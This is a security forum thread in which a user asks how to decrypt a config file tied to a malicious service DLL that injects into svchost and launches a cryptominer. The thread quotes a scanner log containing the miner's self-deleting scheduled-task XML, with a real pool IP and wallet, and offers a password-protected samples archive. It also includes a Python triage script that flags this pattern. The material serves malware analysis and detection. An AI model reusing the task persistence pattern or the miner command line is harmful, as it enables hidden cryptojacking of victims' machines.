safety Posted December 4, 2023

Dear Colleagues!

Is it possible to decrypt a *.dat file paired with mobsync.dll/evntagnt.dll? Presumably this file may contain a config for the task, with the help of which the miner is launched from a folder with an arbitrary name. For example:

RescueSwift-fc4b811c-e35f-4a8d-a903-db85344b9d7f
PicturePerfect-d2f4adbc-5e35-42fd-bfe5-bbdf187ada08
ExpressEditor-22b9dab3-7036-45b3-9fda-b264e8491726
BoltDownloader-e1648eb4-dcd2-4e6d-b19a-7fc96278e3b5

and others.

The miner launch chain looks like this (captured via Universal Virus Sniffer):

Полное имя C:\WINDOWS\SYSWOW64\SVCHOST.EXE
Имя файла SVCHOST.EXE
Тек. статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске
Фильтр Удовлетворяет критериям THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [filtered (0)]

Сохраненная информация на момент создания образа
Статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске
Процесс 32-х битный
File_Id 768582FAD000
Linker 14.20
Размер 46544 байт
Создан 27.11.2023 в 13:19:16
Изменен 27.11.2023 в 13:19:16
TimeStamp 04.01.2033 в 14:21:46
EntryPoint +
OS Version 10.0
Subsystem Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла 32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись Действительна, подписано Microsoft Windows Publisher
Оригинальное имя svchost.exe.mui
Версия файла 10.0.19041.1 (WinBuild.160101.0800)
Описание Хост-процесс для служб Windows
Производитель Microsoft Corporation

Доп. информация на момент обновления списка
pid = 4092 NT AUTHORITY\СИСТЕМА
CmdLine C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa
Процесс создан 13:01:43 [2023.12.03]
С момента создания 00:01:21
CPU 0,09%
CPU (1 core) 1,10%
parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE
Предупреждение (!)
ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\SVCHOST.EXE [4092], tid=5376

Создание задачи \Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl
pid = 4092 NT AUTHORITY\СИСТЕМА
TaskXML
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl</URI>
  </RegistrationInfo>
  <Triggers>
    <RegistrationTrigger id="Trigger1">
      <EndBoundary>2023-12-03T13:02:54</EndBoundary>
      <Enabled>true</Enabled>
      <Delay>PT25S</Delay>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-21-3326377353-2303841640-77764357-1003</UserId>
      <RunLevel>HighestAvailable</RunLevel>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
    <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command>
      <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments>
    </Exec>
  </Actions>
</Task>
Время 13:01:49 [2023.12.03]
parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE
SHA1 53C010F3CC328D4764359DA02D209750E4616BB4
MD5 BBFF42F3C7E8FC0E3049F6F88FBB88E2

Ссылки на объект
Ссылка HKLM\System\CurrentControlSet\Services\EvntAgntSvc_daa0aa\ImagePath
ImagePath %SystemRoot%\SysWOW64\svchost.exe -k DcomLaunch
DisplayName EvntAgnt_999b80
Description Event Translator SNMP subagent
EvntAgntSvc_daa0aa тип запуска: Авто (2)
Изменен 27.11.2023 в 12:21:35

Образы EXE и DLL
SVCHOST.EXE C:\WINDOWS\SYSWOW64

Загруженные DLL НЕИЗВЕСТНЫЕ
EVNTAGNT.DLL C:\WINDOWS\SYSWOW64
--------------------

Here is the task (TaskXML <?xml version="1.0" encoding="UTF-16"?>) created after the service starts: C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa

Presumably, this is the task that is extracted from the *.dat file. After creating the task, the miner is launched from the preinstalled folder, in this case from C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a

Execution block:
<Exec>
  <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command>
  <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments>
</Exec>

There are three different pairs in the archives, collected from different cases.
Archive password - "infected" (without quotes)

Samples.rar
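The following Python script is an example added to this thread; it is not the poster's code and not an ESET tool. It parses a Task Scheduler XML export like the one quoted above and reports the traits a responder would pull out of it: an action that executes from a "<Name>-<GUID>" folder under ProgramData (the naming the post lists), a command line carrying several miner-style switches, a one-shot RegistrationTrigger combined with DeleteExpiredTaskAfter PT0S (the task runs once shortly after registration and then removes itself), and a request for RunLevel HighestAvailable. It also extracts the --server and --user values so they can be blocklisted or hunted for on other hosts. Its first sample input is the task from the post, trimmed to the elements the checks read, with the defanged "hxxp" namespace restored to the real Task Scheduler schema URI; the benign comparison task is constructed. The function names (parse_task, exec_indicators, triage_task) and the extra "--pool" switch in the list are the example's own assumptions.

```python
"""Triage a Windows Task Scheduler XML export for the launch pattern shown in the
post: a one-shot, self-deleting registration task that runs a binary from a
GUID-suffixed ProgramData folder with mining-style switches.  Added example for
this thread; not the poster's code and not an ESET tool."""
import re
import xml.etree.ElementTree as ET

# Real Task Scheduler schema namespace (the post shows it defanged as "hxxp").
NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Sample 1: the task quoted in the post, trimmed to the elements the checks read.
MINER_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl</URI></RegistrationInfo>
  <Triggers>
    <RegistrationTrigger id="Trigger1">
      <EndBoundary>2023-12-03T13:02:54</EndBoundary>
      <Enabled>true</Enabled>
      <Delay>PT25S</Delay>
    </RegistrationTrigger>
  </Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command>
      <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Sample 2: a constructed benign task (daily notepad launch) for comparison.
BENIGN_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2023-12-01T09:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings>
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\notepad.exe</Command></Exec></Actions>
</Task>"""

# "<Name>-<GUID>" folder directly under ProgramData, as in the four names the post lists.
GUID_DIR_RE = re.compile(
    r"^[A-Za-z]:\\ProgramData\\[A-Za-z0-9]+-[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\",
    re.IGNORECASE,
)
# Switches seen in the posted command line; "--pool" is an assumed extra, not from the post.
MINER_SWITCHES = ("--algo", "--server", "--user", "--pers", "--pool")


def parse_task(xml_text):
    """Parse a task export given as str (declaration stripped, since it claims
    UTF-16 while the str is already decoded) or as the raw bytes schtasks writes."""
    if isinstance(xml_text, str):
        xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    return ET.fromstring(xml_text)


def _text(root, *path):
    """Text of the element at the namespaced path, or '' if absent."""
    node = root.find("/".join(NS + p for p in path))
    return (node.text or "").strip() if node is not None else ""


def exec_indicators(arguments):
    """Pull the pool endpoint and wallet/user out of '--server X --user Y' style
    arguments so they can be fed to blocklists or hunted for on other hosts."""
    tokens = arguments.split()
    found = {}
    for flag, key in (("--server", "server"), ("--user", "user")):
        if flag in tokens and tokens.index(flag) + 1 < len(tokens):
            found[key] = tokens[tokens.index(flag) + 1]
    return found


def triage_task(xml_text):
    """Return the Exec action, extracted indicators and a list of suspicious traits."""
    root = parse_task(xml_text)
    command = _text(root, "Actions", "Exec", "Command")
    arguments = _text(root, "Actions", "Exec", "Arguments")
    findings = []
    if GUID_DIR_RE.match(command):
        findings.append("executes from a GUID-suffixed ProgramData folder")
    hits = [s for s in MINER_SWITCHES if s in arguments.split()]
    if len(hits) >= 2:
        findings.append("miner-style switches: " + " ".join(hits))
    reg = root.find(f"{NS}Triggers/{NS}RegistrationTrigger")
    if (reg is not None and reg.find(f"{NS}EndBoundary") is not None
            and _text(root, "Settings", "DeleteExpiredTaskAfter") == "PT0S"):
        findings.append("one-shot RegistrationTrigger that deletes itself on expiry")
    if _text(root, "Principals", "Principal", "RunLevel") == "HighestAvailable":
        findings.append("requests RunLevel HighestAvailable")
    return {"command": command, "arguments": arguments,
            "indicators": exec_indicators(arguments), "findings": findings}


if __name__ == "__main__":
    for label, xml in (("posted task", MINER_TASK_XML), ("benign task", BENIGN_TASK_XML)):
        result = triage_task(xml)
        print(label, "->", result["findings"] or ["nothing suspicious"], result["indicators"])
```

On a live host the same function can be fed the output of `schtasks /query /xml /tn <name>` (read as bytes, so the UTF-16 declaration is honoured); the self-deleting trigger is worth noting because, as the post's timestamps show, the task expires about a minute after registration, so the Scheduled Tasks folder will look clean unless task-creation events are being logged.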
Marcos (Administrator) Posted December 4, 2023

This forum is not intended for reporting suspicious samples. Please submit them as per the instructions at https://support.eset.com/en/kb141 and include information why you think they are malicious.

I've scanned one of the dlls and it has zero detections at VirusTotal: https://www.virustotal.com/gui/file/4b8c5f3064f6e084ed1563886b1aa3f3898b1bf51718ab3913967ccfbf6c7c00?nocache=1
safety (Author) Posted December 4, 2023

Dear Marcos,

The fact of the matter is that nothing is detected. However, through this service, a malicious thread is injected into syswow64\svchost.exe and the folder with the miner is restored. If it was deleted, restoration occurs with a different name.

Okay, I'll send the files to Virlab.